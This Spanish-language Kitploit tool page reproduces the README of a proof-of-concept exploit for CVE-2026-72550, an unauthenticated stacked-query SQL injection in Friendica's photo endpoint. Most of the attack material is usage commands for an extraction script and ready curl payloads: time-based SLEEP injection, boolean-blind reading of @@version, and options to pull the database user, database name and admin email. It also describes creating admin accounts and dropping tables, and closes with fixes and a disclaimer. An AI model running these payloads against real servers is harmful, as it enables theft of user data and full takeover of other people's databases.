Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-72550-poc — CVE-2026-72550 — PoC de inyección SQL de consultas apiladas no autenticada en Friendica (CVSS 9.8 Crítico) | Kitploit
Herramientas/GitHubGitHub/abdugafforov-bobur/cve-2026-72550-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubabdugafforov-bobur/cve-2026-72550-poc

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-72550-poc

CVE-2026-72550 — PoC de inyección SQL de consultas apiladas no autenticada en Friendica (CVSS 9.8 Crítico)

Ver Repositorio
hace 7 díasAún no revisado

CVE-2026-72550 — Inyección SQL no autenticada en Friendica

La inyección SQL de consultas apiladas no autenticada en el endpoint de fotos de Friendica permite que cualquier visitante ejecute SQL arbitrario.

CampoValor
CVE IDCVE-2026-72550
ProductoFriendica (red social federada autoalojada)
Afectado<= 2026.08-dev (git HEAD e3fc1bc)
TipoCWE-89: Inyección SQL (no autenticada, consultas apiladas)
GravedadCrítica — CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Autenticación requeridaNinguna

Resumen

El endpoint de vista de fotos en Friendica toma el parámetro de consulta order y lo concatena, sin escapar, en una sentencia SHOW COLUMNS ... LIKE '...' que se ejecuta mediante un PDO::query() sin protección — lo que permite múltiples sentencias. No se requiere inicio de sesión y, en una instalación estándar (block_public está desactivado por defecto), cualquier foto visible públicamente es suficiente. Debido a que PDO::query() ejecuta sentencias apiladas, un atacante anónimo no solo lee datos: ejecuta SQL arbitrario, incluidos INSERT/UPDATE para crear un usuario administrador.

Ruta de código vulnerable

root@kitploit:~
mod/photos.php:673              — reads raw $_GET['order']
DBStructure::existsColumn()     — concatenates into: SHOW COLUMNS FROM `photo` LIKE '$column'
  src/Database/DBStructure.php:714
DBA::p() → PDO::query()         — executes with stacked statements enabled

La ruta de solicitud predeterminada llega a este código: $cmd tiene como valor predeterminado 'view' (satisfaciendo la condición $cmd === 'view') y no_count está desactivado, por lo que no se necesita autenticación ni ninguna configuración no predeterminada.

Uso

root@kitploit:~
# Install dependency
pip install requests

# Check if target is vulnerable (time-based detection)
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --check-only

# Extract database version via blind SQLi
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract version

# Extract current database user
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_user

# Extract current database name
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_name

# Extract first admin email
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract admin_email

Parámetros

Reproducción manual

No se necesitan cookies ni autenticación. Apunta a cualquier resource-id de una foto pública:

root@kitploit:~
# Control — valid order, returns fast (~0.05s)
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=created"

# Injection — stacked SLEEP(5) executes, response held ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20SLEEP(5)--%20-"

Payload decodificado: x';SELECT SLEEP(5)-- -

El SQL inyectado queda así:

root@kitploit:~
SHOW COLUMNS FROM `photo` LIKE 'x';SELECT SLEEP(5)-- -'

Extracción booleana ciega

root@kitploit:~
# TRUE condition (@@version starts with '1') → delays ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%271%27,SLEEP(5),0)--%20-"

# FALSE condition (@@version starts with '9') → returns fast
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%279%27,SLEEP(5),0)--%20-"

Impacto

Un atacante no autenticado puede:

  • Leer cualquier dato de la base de datos (extracción ciega de credenciales, correos electrónicos, mensajes privados)
  • Escribir filas arbitrarias — incluida la creación de una cuenta de administrador mediante INSERT INTO user
  • Modificar datos existentes — escalar a cualquier usuario a administrador, alterar publicaciones, restablecer contraseñas
  • Eliminar datos o soltar tablas (denegación de servicio)

Esto es un compromiso total de la base de datos alcanzable por cualquier visitante anónimo en una instalación predeterminada de Friendica.

Corrección

  1. Validar order contra la lista blanca de columnas conocidas antes de usarlo
  2. Usar consultas parametrizadas en lugar de concatenación de cadenas en SHOW COLUMNS
  3. Deshabilitar la ejecución de múltiples sentencias en la conexión PDO (PDO::ATTR_EMULATE_PREPARES => false)

Cronología

FechaEvento
2026-07-07Vulnerabilidad descubierta y confirmada en una instancia local
2026-08-11CVE-2026-72550 publicado a través de TuranSec CNA

Descargo de responsabilidad

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. Úsala solo contra sistemas que te pertenezcan o para los que tengas permiso escrito explícito para realizar pruebas. El autor no asume ninguna responsabilidad por el mal uso.

Créditos

Descubierto por Bobur Abdugafforov (@abdugafforov-bobur)

CVE asignado a través del CNA de TuranSec

Descargar herramienta
IndicadorDescripción
-u / --urlURL base del objetivo (p. ej. http://target:8176)
-r / --userNombre de usuario cuya galería de fotos se va a atacar
-i / --resource-idID de recurso de cualquier foto visible públicamente
--extractValor a extraer: version, db_user, db_name, admin_email
--check-onlySolo probar la vulnerabilidad, no extraer datos
--sleepRetardo de SLEEP en segundos (por defecto: 5)